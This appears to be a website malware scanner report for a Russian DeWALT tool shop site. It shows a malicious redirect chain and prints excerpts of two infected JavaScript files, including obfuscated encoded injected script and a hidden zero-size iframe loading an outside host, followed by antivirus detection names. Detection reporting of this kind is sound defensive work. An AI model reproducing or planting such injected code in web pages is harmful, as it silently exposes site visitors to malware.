New scan:

Malware Scanner report for dewalt4whole-world.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://www.totalcarsolution.com/sctcom/cgi-bin/1.php
175 websites infected.
->http://www.csra.de/includes/domit/1.php
346 websites infected.

The website "dewalt4whole-world.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://dewalt4whole-world.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: dewalt4whole-world.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Tue, 23 Sep 2014 06:19:23 GMT
Location: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php
Server: Apache/1.3.42
Content-Type: text/html
malicious
URL: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php
(imitation of visitor from search engine)

GET /sctcom/cgi-bin/1.php HTTP/1.1
Host: www.totalcarsolution.com
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 23 Sep 2014 06:19:24 GMT
Location: http://www.csra.de/includes/domit/1.php
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
malicious

Scanned pages/files

RequestServer responseStatus
http://dewalt4whole-world.ru/
200 OK
Content-Length: 12086
Content-Type: text/html
clean
http://dewalt4whole-world.ru/media/system/js/caption.js
200 OK
Content-Length: 8465
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 3169 bytes are skipped ...
5%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%65%30%39%32%5B%31%5D%5D%28%5F%30%78%65%30%39%32%5B%30%5D%29%3B%3C%2F%73%63%72%69%70%74%3E'));
document.write('<iframe src="'+'ht'+'tp://b'+'arbu'+'ch'+'er'+'on.ca/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');

Antivirus reports:

AntiVir
HTML/Infected.tcr
Avast
JS:Iframe-DPM [Trj]
Ad-Aware
Trojan.JS.Agent.JAB
nProtect
Trojan.JS.Agent.JAB
K7AntiVirus
Trojan ( 91ee82b70 )
Emsisoft
Trojan.JS.Agent.JAB (B)
Comodo
TrojWare.JS.Agent.TC
K7GW
Trojan ( 91ee82b70 )
MicroWorld-eScan
Trojan.JS.Agent.JAB
NANO-Antivirus
Trojan.Script.Iframe.brhxqu
F-Secure
Trojan.JS.Agent.JAB
F-Prot
JS/Redir.SA
AVG
HTML/Framer
Norman
ShellCode.V
GData
Trojan.JS.Agent.JAB
Commtouch
JS/Redir.SA
ESET-NOD32
JS/Redirector.NJF.Gen
BitDefender
Trojan.JS.Agent.JAB

http://dewalt4whole-world.ru/templates/DeWALT2/script.js
200 OK
Content-Length: 17065
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var artEventHelper = {
'bind': function(obj, evt, fn) {
if (obj.addEventListener)
obj.addEventListener(evt, fn, false);
else if (obj.attachEvent)
obj.attachEvent('on' + evt, fn);
else
obj['on' + evt] = fn;
}
};
var artUserAgent = navigator.userAgent.toLowerCase();
var artBrowser = {
version: (artUserAgent.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[1],
safari: /webkit/.test(artUserAgent) && !/chrome/.test(artUserA
... 3289 bytes are skipped ...
7%35%5C%78%36%43%5C%78%36%35%5C%78%37%33%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%65%30%39%32%5B%31%5D%5D%28%5F%30%78%65%30%39%32%5B%30%5D%29%3B%3C%2F%73%63%72%69%70%74%3E'));

Antivirus reports:

AntiVir
HTML/Infected.tcr
Avast
JS:Iframe-DPM [Trj]
Ikarus
JS.Iframe
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Agent.TC
Kaspersky
HEUR:Trojan.Script.Generic
NANO-Antivirus
Trojan.Script.Iframe.brhxqu
F-Prot
JS/Redir.SA
AVG
HTML/Framer
Commtouch
JS/Redir.SA
ESET-NOD32
JS/Redirector.NJF.Gen

http://counter.rambler.ru/top100.jcn?2554413
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://dewalt4whole-world.ru/component/content/article/1-2010-03-27-01-11-53.html
200 OK
Content-Length: 11988
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument.html
200 OK
Content-Length: 38621
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/329-dewalt-drel-akkumulatornajadw-006-k.html
200 OK
Content-Length: 17897
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/307-dewalt-drel-akkumulatornajadw-955-k.html
200 OK
Content-Length: 18023
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/41-dewaltdrelakkumulatornajadc745kb.html
200 OK
Content-Length: 18005
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/319-dewalt-drel-akkumulatornajadw-997-k2.html
200 OK
Content-Length: 18066
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/322-dewalt-drel-akkumulatornajadw-981-k2.html
200 OK
Content-Length: 18043
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/320-dewalt-drel-akkumulatornajadw-927-k2.html
200 OK
Content-Length: 17809
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/326-dewalt-drel-akkumulatornajadw-926-k2.html
200 OK
Content-Length: 17718
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli.html
200 OK
Content-Length: 32156
Content-Type: text/html
clean
http://dewalt4whole-world.ru/akkumulatornij-instrument/dreli/328-dewalt-drel-akkumulatornajadc-984-ka.html
200 OK
Content-Length: 17928
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=dewalt4whole-world.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dewalt4whole-world.ru/

Result: dewalt4whole-world.ru is not infected or malware details are not published yet.